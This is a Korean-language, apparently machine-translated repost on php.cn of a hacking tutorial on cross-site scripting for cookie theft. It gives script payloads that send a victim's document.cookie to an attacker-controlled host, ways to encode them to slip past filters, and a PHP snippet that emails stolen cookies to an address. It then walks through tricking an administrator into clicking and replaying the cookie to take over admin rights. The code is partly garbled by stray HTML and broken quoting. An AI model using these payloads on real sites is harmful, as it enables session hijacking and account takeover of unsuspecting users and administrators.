쿠키 스푸핑으로 JavaScript 실행을 숨기는 XSS 공격

高洛峰
풀어 주다: 2016-11-25 09:45:00
원래의
1450명이 탐색했습니다.

예를 들어 XSS가 가능한 곳을 찾으면:
<script>alert(무슨 일이 있어도 팝업으로 표시)</script>

쿠키 스틸링 파일 받기 당신 자신.

다른 시청자가 우리가 디자인한 트랩을 탐색할 수 있도록 하는 것이 목적입니다
<script>document.location=http://URL.com/cookie.php?cookie='+escape( document.cookie) </script>

어떻게 하는지 더 말씀드릴 필요가 없습니다. .

이제 주로 JavaScript 실행을 숨기는 방법에 대해 이야기하겠습니다.

EXS를 보기 위해 매일 milw0rm.com에 가는 것이 익숙할 것입니다.

XSS 취약점의 EXP가 공개될 때마다 이를 악용합니다.

그런데 어떤 정보도 쿠키할 수 없는데 왜 그럴까요? .

Magic 및 PHPBB와 같은 대규모 포럼에는 모두 XSS 취약점이 있습니다.

내가 이것을 주었습니다
<script>document.location=http://URL.com/cookie.php?cookie='+escape(document.cookie) </script&gt ;<br><br>은 Javascript 오류를 표시합니다. <br><br>두 가지 솔루션이 있습니다. 외부의 민감한 정보를 유니코드로 인코딩할 수 있습니다. <br><br>URL을 제공하세요: http://www.mikezilla.com/exp0012.html<br><br> 인코딩을 통한 방법: <br><script>eval(location.href="http://www.php1.cn/"><br>위의 방법으로 문제가 해결되지 않으면 두 번째 방법을 사용하세요<br> <br> Javascript fromCharCode의 eval 함수<br><br>위에서 언급했듯이 일부 웹사이트는 유니코드로 인코딩될 수 있습니다<br><br>예를 들어 인코딩된 104, 116, 116, 112는 HTTP입니다<br><br>포럼에서 PHPWind에서 사용하는 WYSIWYG 편집기<br><br>와 같은 다른 편집기를 사용하는 경우 http://url.com을 직접 입력하면 <br><br>이 노출됩니다. URL 형식에 따라 변경하세요<br><br>예를 들어 COOKIE를 훔치는 웹사이트는 http://www.URL.com<br><br>다음과 같이 하겠습니다<br>http: //www.url.com<br><br>물론 표시된 부분을 매력적인 정보로 대체하여 관리 및 클릭을 속일 수 있습니다. <br><br>이제 약간의 소셜 엔지니어링을 사용하는 것만으로도 충분합니다. 완료, 시작해 볼까요<br><br>1단계: 관리자가 우리가 구축한 트랩을 보고 클릭했습니다<br><br>2단계: Javascript가 성공적으로 실행되었습니다.<br><br>3단계 . : 쿠키를 훔치기 위해 훔친 COOKIE 파일 생성 <br><br> 4단계: URL 연결이 일반 텍스트이고 URL을 유니코드로 인코딩할 정도로 멍청할 수는 없습니다(여기서는 암호화되었다고 말하는 것이 관례입니다) http: //www.mikezilla.com/exp0012.html<br><br>5단계: 가로채는 쿠키 정보는 물론 일반 텍스트가 아닙니다. FireFox 쿠키 편집기<br>를 사용하여 COOKIE를 교체하면 됩니다. CookieEditor 등의 다른 도구를 사용하세요. <br><br>개인적인 제안: 쿠키를 훔친다고 해서 반드시 쿠키 정보를 수집하기 위해 공간을 사용한다는 의미는 아닙니다<br>예를 들어 쿠키를 수집하기 위해 메일함을 구성하는 것은 다음과 같습니다<br><?<br/><br/>mail("hackeroo@hotmail.com ","쿠키 몬스터",$_REQUEST[쿠키]);<br/><br/>?><br><html><br><script> document.location=http://www.URL.com /'</script>


좋아, 귀중한 정보를 훔치고 쿠키를 교체하면 됩니다. . 부주를 대신하는 것이 부주의 권한이고, 관리를 대신하는 것이 관리권한이다. .

관련 라벨:
원천:php.cn
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿